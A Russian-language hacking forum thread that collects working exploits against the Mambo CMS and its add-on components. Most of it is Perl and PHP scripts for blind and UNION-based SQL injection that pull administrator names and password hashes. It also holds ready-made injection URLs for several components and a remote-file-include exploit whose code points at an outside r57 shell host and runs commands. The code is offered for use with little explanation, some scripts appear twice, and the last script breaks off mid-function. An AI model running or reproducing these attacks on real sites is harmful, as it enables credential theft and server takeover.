Уязвимости: Mambo

Winux · 25.04.2006

Mambo <= 4.5.3h Remote Sql Injection

Код:

#!/usr/bin/perl -w

use LWP::UserAgent;

print q{
Mambo <= 4.5.3h Remote Sql Injection Exploit (gpc = off)
Exploit written by KingOfSka @ contropotere.netsons.org
discovered by James Bercegay of the GulfTech Security Research Team

};

   $ua = new LWP::UserAgent;
   $ua->agent("ControPotereExploiter" . $ua->agent);

if (!$ARGV[1]) {$ARGV[1] = 'admin';}



my $user = $ARGV[1];   

if (!$ARGV[0])
{
        print "Usage: mambo.pl http://www.site.com/mambo [nickname] \n\n";
        exit;
}


my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ )
{
        for( $j=0; $j < 16; $j++ )
        {
                my $current = $charset[$j];
               my $path = $ARGV[0] . "/index2.php?option=com_content&task=-99'%20UNION%20SELECT%20password%20FROM%20mos_users%20WHERE%20username='$user'%20AND%20MID(password,$i,1)='$current'/*";
                my $res = $ua->get($path);

               
                $pattern = 'You are not authorized to view this resource';

                $_ = $res->content;

             

                if ( (/$pattern/) )
                {
                        $outputs .= $current;
                        print "$i/32 found\n";
                    last;
                }

        }
  if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     }
}
print "Password Hash is : $outputs \n";
exit;

Ŧ1LAN · 18.06.2006

Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit
Вот ещё один сплоит от товарисча rgod'a.
Эксплоит:

Код:

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\r\n";
echo "disclosure exploit (benchmark() vesion)\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "this is called the Sun-Tzu 'trascendental guru meditation' tecnique\r\n\r\n";

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to Mambo\r\n";
echo "user/pass: you need an account\r\n";
echo "Options:\r\n";
echo "   -T[prefix]   specify a table prefix different from 'mos_'\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /mambo/ username password\r\n";
die;
}

/*
  explaination:

  sql injection in "title" argument when you submit a web link, poc:
  start mysql daemon with log option...

  >mysqld --log=mambo.txt

  now login, go to "Submit Weblink" feature, in "Name: " field type:

  99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*

  in mambo.txt we have:

  13 Query       SELECT id FROM mos_weblinks
                 WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'

  injection is blind but, as you can see, we can you use time delays through Mysql
  benchmark() function to ask questions about tables

  this works regardless of magic_quotes_gpc settings

*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="mos_";
$proxy="";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data ="username=".$user;
$data.="&passwd=".$pass;
$data.="&remember=yes";
$data.="&option=login";
$data.="&Submit=login";
$data.="&op2=login";
$data.="&lang=english";
$data.="&return=".urlencode("http://".$host.$path);
$data.="&message=0";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if ((strstr($cookie,"=+;")) | $cookie=="") {die("Unable to login...");}
else
{
echo "Done...\r\ncookie -> ".$cookie."\r\n";
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$starttime=time();
$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(username,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
echo "\r\n".$sql."\r\n";
$sql=urlencode($sql);
$data ="title=".$sql;
$data.="&catid=2";
$data.="&url=http://www.google.com";
$data.="&description=";
$data.="&id=0";
$data.="&option=com_weblinks";
$data.="&task=save";
$data.="&ordering=0";
$data.="&approved=0";
$data.="&Returnid=0";
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
//debug
//echo quick_dump($packet)."\r\n";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > 7) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;} //more than seven seconds? we succeed...
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
  $starttime=time();
  $sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(password,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
  echo "\r\n".$sql."\r\n";
  $sql=urlencode($sql);
  $data ="title=".$sql;
  $data.="&catid=2";
  $data.="&url=http://www.google.com";
  $data.="&description=";
  $data.="&id=0";
  $data.="&option=com_weblinks";
  $data.="&task=save";
  $data.="&ordering=0";
  $data.="&approved=0";
  $data.="&Returnid=0";
  $packet ="POST ".$p."index.php HTTP/1.0\r\n";
  $packet.="User-Agent: Googlebot/2.1\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Accept: text/plain\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Cookie: ".$cookie."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n\r\n";
  $packet.=$data;
  //debug
  //echo quick_dump($packet)."\r\n";
  sendpacketii($packet);
  $endtime=time();
  echo "endtime -> ".$endtime."\r\n";
  $difftime=$endtime - $starttime;
  echo "difftime -> ".$difftime."\r\n";
  if ($difftime > 7) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
  if ($i==255) {die("Exploit failed...");}
  }
  $j++;
}
//if you are here...
echo "Exploit succeeded...\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
?>

not null · 18.06.2006

Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit

уязвимость так же работает и против Joomla <= 1.0.9.
Ссылка на эксплоит

baltazar · 16.10.2008

Sql

Mambo Component mambads 1.0 RC1 Beta

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Код:

#!/usr/bin/perl -w

#   Mambo Component mambads  1.0 RC1 Beta & 1.0 RC1 Remote SQL Injection #
########################################
#[*] Found by : Houssamix From H-T Team 
#[*] H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
#[*] Greetz : Stack & CoNaN & HaCkeR_EgY & room-hacker & Hak3r-b0y & All friends & All muslims HaCkeRs  :) 
#[*] Script_Name: "Mambo"
#[*] Component_Name: mambads  1.0 RC1 Beta & 1.0 RC1
#[*] Dork: index.php?option=com_mambads


system("color f");
print "\t\t########################################################\n\n";
print "\t\t#                        Viva Islam                    #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Mambo Component mambads  Remote SQL Injection    #\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350]                #\n\n";
print "\t\t########################################################\n\n";

use LWP::UserAgent;

print "\nEnter your Target (http://site.com/mambo/): ";
	chomp(my $target=<STDIN>);

$uname="username";
$passwd="password";
$magic="mos_users";
$pass1="imambo";
$pass2="aspen";
$pass3="ligio";
$pass4="qwally";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "/index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%20union%20select%20concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62))from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

print "\n[+] The Target : ".$target."";

if ($answer =~ /<user>(.*?)<user>/){
       
  print "\n[+] Admin User : $1";
}
$host2 = $target . "/index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%20union%20select%20".$passwd."/**/from/**/".$magic."/**";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
  print "\n[+] Admin Hash : $1\n\n";
  print "#   Exploit succeed!  #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}
if ($answer =~/697d54f398600b7ff10860a4422a6ea3/){print "[+] md5 cracked :".$pass4."\n\n";}
if ($answer =~/53138ba09b49380fea0aa99bb9ab511d/){print "[+] md5 cracked :".$pass3."\n\n";}
if ($answer =~/68e3d2564cb5858e2b69f1f49dfe40a3/){print "[+] md5 cracked :".$pass1."\n\n";}
if ($answer =~/91a343c02e6c4e10b023216ecfcd69e7/){print "[+] md5 cracked :".$pass2."\n\n";}

# codec  by Houssamix From H-T Team
# special thx to : StaCk

Mambo <= 4.5.3h Remote Sql Injection

Уязвимость существует из-за недостаточной проверки привилегий на доступ в сценарии includes/pdf.php. Подробности уязвимости не сообщаются.

Код:

#!/usr/bin/perl -w

use LWP::UserAgent;

print q{
Mambo <= 4.5.3h Remote Sql Injection Exploit (gpc = off)
Exploit written by KingOfSka @ contropotere.netsons.org
discovered by James Bercegay of the GulfTech Security Research Team

};

  $ua = new LWP::UserAgent;
  $ua->agent("ControPotereExploiter" . $ua->agent);

if (!$ARGV[1]) {$ARGV[1] = 'admin';}



my $user = $ARGV[1];  

if (!$ARGV[0])
{
       print "Usage: mambo.pl http://www.site.com/mambo [nickname] \n\n";
       exit;
}


my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ )
{
       for( $j=0; $j < 16; $j++ )
       {
               my $current = $charset[$j];
              my $path = $ARGV[0] . "/index2.php?option=com_content&task=-99'%20UNION%20SELECT%20password%20FROM%20mos_users%20WHERE%20username='$user'%20AND%20MID(password,$i,1)='$current'/*";
               my $res = $ua->get($path);

             
               $pattern = 'You are not authorized to view this resource';

               $_ = $res->content;

           

               if ( (/$pattern/) )
               {
                       $outputs .= $current;
                       print "$i/32 found\n";
                   last;
               }

       }
 if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     }
}
print "Password Hash is : $outputs \n";
exit;




Mambo <= 4.6rc1 (Weblinks) Blind SQL Injection Exploit

Данная уязвимость существует из-за недостаточной фильрации входящих данных.
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Mambo <= 4.6rc1 'Weblinks' blind SQL injection / admin credentials\r\n";
echo "disclosure exploit (benchmark() vesion)\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "this is called the Sun-Tzu 'trascendental guru meditation' tecnique\r\n\r\n";

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to Mambo\r\n";
echo "user/pass: you need an account\r\n";
echo "Options:\r\n";
echo "   -T[prefix]   specify a table prefix different from 'mos_'\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /mambo/ username password\r\n";
die;
}

/*
 explaination:

 sql injection in "title" argument when you submit a web link, poc:
 start mysql daemon with log option...

 >mysqld --log=mambo.txt

 now login, go to "Submit Weblink" feature, in "Name: " field type:

 99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(200000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*

 in mambo.txt we have:

 13 Query       SELECT id FROM mos_weblinks
                WHERE title='99999' UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype='Super Administrator'/*' AND catid='2'

 injection is blind but, as you can see, we can you use time delays through Mysql
 benchmark() function to ask questions about tables

 this works regardless of magic_quotes_gpc settings

*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
 $result='';$exa='';$cont=0;
 for ($i=0; $i<=strlen($string)-1; $i++)
 {
  if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
  {$result.="  .";}
  else
  {$result.="  ".$string[$i];}
  if (strlen(dechex(ord($string[$i])))==2)
  {$exa.=" ".dechex(ord($string[$i]));}
  else
  {$exa.=" 0".dechex(ord($string[$i]));}
  $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 }
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
 global $proxy, $host, $port, $html, $proxy_regex;
 if ($proxy=='') {
   $ock=fsockopen(gethostbyname($host),$port);
   if (!$ock) {
     echo 'No response from '.$host.':'.$port; die;
   }
 }
 else {
$c = preg_match($proxy_regex,$proxy);
   if (!$c) {
     echo 'Not a valid proxy...';die;
   }
   $parts=explode(':',$proxy);
   echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
   $ock=fsockopen($parts[0],$parts[1]);
   if (!$ock) {
     echo 'No response from proxy...';die;
}
 }
 fputs($ock,$packet);
 if ($proxy=='') {
   $html='';
   while (!feof($ock)) {
     $html.=fgets($ock);
   }
 }
 else {
   $html='';
   while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
     $html.=fread($ock,1);
   }
 }
 fclose($ock);
 #debug
 #echo "\r\n".$html;
}

function is_hash($hash)
{
if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
else {return false;}
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="mos_";
$proxy="";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
 $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
 $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
 $prefix=str_replace("-T","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data ="username=".$user;
$data.="&passwd=".$pass;
$data.="&remember=yes";
$data.="&option=login";
$data.="&Submit=login";
$data.="&op2=login";
$data.="&lang=english";
$data.="&return=".urlencode("http://".$host.$path);
$data.="&message=0";
$packet ="POST ".$p." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$cookie="";
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if ((strstr($cookie,"=+;")) | $cookie=="") {die("Unable to login...");}
else
{
echo "Done...\r\ncookie -> ".$cookie."\r\n";
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
$starttime=time();
$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(username,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
echo "\r\n".$sql."\r\n";
$sql=urlencode($sql);
$data ="title=".$sql;
$data.="&catid=2";
$data.="&url=http://www.google.com";
$data.="&description=";
$data.="&id=0";
$data.="&option=com_weblinks";
$data.="&task=save";
$data.="&ordering=0";
$data.="&approved=0";
$data.="&Returnid=0";
$packet ="POST ".$p."index.php HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept: text/plain\r\n";
$packet.="Connection: Close\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Cookie: ".$cookie."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
$packet.=$data;
//debug
//echo quick_dump($packet)."\r\n";
sendpacketii($packet);
$endtime=time();
echo "endtime -> ".$endtime."\r\n";
$difftime=$endtime - $starttime;
echo "difftime -> ".$difftime."\r\n";
if ($difftime > 7) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;} //more than seven seconds? we succeed...
if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
 $starttime=time();
 $sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(password,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
 echo "\r\n".$sql."\r\n";
 $sql=urlencode($sql);
 $data ="title=".$sql;
 $data.="&catid=2";
 $data.="&url=http://www.google.com";
 $data.="&description=";
 $data.="&id=0";
 $data.="&option=com_weblinks";
 $data.="&task=save";
 $data.="&ordering=0";
 $data.="&approved=0";
 $data.="&Returnid=0";
 $packet ="POST ".$p."index.php HTTP/1.0\r\n";
 $packet.="User-Agent: Googlebot/2.1\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n";
 $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
 $packet.="Cookie: ".$cookie."\r\n";
 $packet.="Content-Length: ".strlen($data)."\r\n\r\n";
 $packet.=$data;
 //debug
 //echo quick_dump($packet)."\r\n";
 sendpacketii($packet);
 $endtime=time();
 echo "endtime -> ".$endtime."\r\n";
 $difftime=$endtime - $starttime;
 echo "difftime -> ".$difftime."\r\n";
 if ($difftime > 7) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
}
 if ($i==255) {die("Exploit failed...");}
 }
 $j++;
}
//if you are here...
echo "Exploit succeeded...\r\n";
echo "--------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";
?>

Sql в модуле malite

Что тут говорить?банальная скуля...

Код:

/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Mambo Component rsgallery 2.0b5

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «option» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Код:

_http://target.com/index.php?option=com_rsgallery&page=inline &catid=-1%20union%20select%201,2,3,4,concat(username, 0x3a,password),6,7,8,9,10,11%20from%20mos_users--

Mambo Component SimpleFAQ

Код:

http://localhost/mambo/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/mos_users/*

mambads-expl.pl

Данный екплоит показывает скулю в Mambo Component mambads 1.0 RC1 Beta.

Код:

#!/usr/bin/perl -w

#   Mambo Component mambads  1.0 RC1 Beta & 1.0 RC1 Remote SQL Injection #
########################################
#[*] Found by : Houssamix From H-T Team
#[*] H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
#[*] Greetz : Stack & CoNaN & HaCkeR_EgY & room-hacker & Hak3r-b0y & All friends & All muslims HaCkeRs  :)
#[*] Script_Name: "Mambo"
#[*] Component_Name: mambads  1.0 RC1 Beta & 1.0 RC1
#[*] Dork: index.php?option=com_mambads


system("color f");
print "\t\t########################################################\n\n";
print "\t\t#                        Viva Islam                    #\n\n";
print "\t\t########################################################\n\n";
print "\t\t# Mambo Component mambads  Remote SQL Injection          #\n\n";
print "\t\t# H-T Team [HouSSaMiX - ToXiC350]                      #\n\n";
print "\t\t########################################################\n\n";

use LWP::UserAgent;

print "\nEnter your Target (http://site.com/mambo/): ";
    chomp(my $target=<STDIN>);

$uname="username";
$passwd="password";
$magic="mos_users";
$pass1="imambo";
$pass2="aspen";
$pass3="ligio";
$pass4="qwally";

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $target . "/index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%20union%20select%20concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62))from/**/".$magic."/**";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

print "\n[+] The Target : ".$target."";

if ($answer =~ /<user>(.*?)<user>/){
      
        print "\n[+] Admin User : $1";
}
$host2 = $target . "/index.php?option=com_mambads&Itemid=45&func=view&ma_cat=99999%20union%20select%20".$passwd."/**/from/**/".$magic."/**";
$res2 = $b->request(HTTP::Request->new(GET=>$host2));
$answer = $res2->content;
if ($answer =~/([0-9a-fA-F]{32})/){
        print "\n[+] Admin Hash : $1\n\n";
        print "#   Exploit succeed!  #\n\n";
}
else{print "\n[-] Exploit Failed...\n";
}
if ($answer =~/697d54f398600b7ff10860a4422a6ea3/){print "[+] md5 cracked :".$pass4."\n\n";}
if ($answer =~/53138ba09b49380fea0aa99bb9ab511d/){print "[+] md5 cracked :".$pass3."\n\n";}
if ($answer =~/68e3d2564cb5858e2b69f1f49dfe40a3/){print "[+] md5 cracked :".$pass1."\n\n";}
if ($answer =~/91a343c02e6c4e10b023216ecfcd69e7/){print "[+] md5 cracked :".$pass2."\n\n";}

# codec  by Houssamix From H-T Team
# special thx to : StaCk 


Mambo Module Flatmenu 1.07

#!/usr/bin/perl

#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-   - - [The Best Arab Security And Hacking Team] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Mambo 4.5.1 Modules Flatmenu <= 1.07 Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: Flatmenu 1.07 for Mambo 4.5.1
#- [Script site: http://mamboxchange.com/frs/download.php/2376/Flatmenu10b07_451_1.zip
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-            Coded And Found By Coldz3ro
#-           Cold-z3ro[at]hotmail[dot]com
#-                 Ilove You HanaH
#+      Big thanks For You My Love Greeneyes_Amor
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use Tk;
use Tk::DialogBox;
use LWP::UserAgent;

$mw = new MainWindow(title => "Team Hell Crew :: Mambo 4.5.1 Modules Flatmenu <= 1.07 Remote File Include Exploit :: by Cold z3ro;-)  " );
$mw->geometry ( '500x300' );
$mw->resizable(0,0);

$mw->Label(-text => 'Mambo 4.5.1 Modules Flatmenu <= 1.07 Remote File
Include Exploit', -font => '{Verdana} 7 bold',-foreground=>'blue')->pack();
$mw->Label(-text => '')->pack();

$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne');
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw');

$url = 'http://www.site.com/[Mambo_path]/modules/mod_flatmenu.php?mosConfig_absolute_path=';
$shell_path = 'http://nachrichtenmann.de/r57.txt?';
$cmd = 'ls -la';


$fleft->Label ( -text => 'Script Path: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' );

$fleft->Label ( -text => 'Shell Path: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' );
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$shell_path) ->pack ( -side => "top" , -anchor => 'w' );

$fleft->Label ( -text => 'CMD: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' );
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$cmd) ->pack ( -side => "top" , -anchor => 'w' );

$fright->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();



$fright->Button(-text    => 'Exploit Include Vulnerability',
               -relief => "groove",
               -width => '30',
               -font => '{Verdana} 8 bold',
               -activeforeground => 'red',
               -command => \&akcja
              )->pack();


$fright->Label( -text => ' ')->pack();
$fright->Label( -text => 'Exploit Coded By Cold z3ro [Wasem898]', -font => '{Verdana} 7')->pack();
$fright->Label( -text => 'Team Hell Crew :: The Best Arab Security And Hacking Team', -font => '{Verdana} 7')->pack();
$fright->Label( -text => 'Cold-z3ro@hotmail.com', -font => '{Verdana} 7')->pack();
$fright->Label( -text => ' Long Life My Home Land Palestine', -font => '{Verdana} 7')->pack();
$fright->Label( -text => ' ~~\Big thanks For You My Love Greeneyes_Amor/~~', -font => '{Verdana} 7')->pack();
MainLoop();

sub akcja()
{
$InfoWindow=$mw->DialogBox(-title   => 'Team Hell Crew :: Exploit by Cold
z3ro;-) ', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => ' For help Cold-z3ro@hotmail.com #Team Hell', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'Team Hell Site: http://www.Hack-teach.com/', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
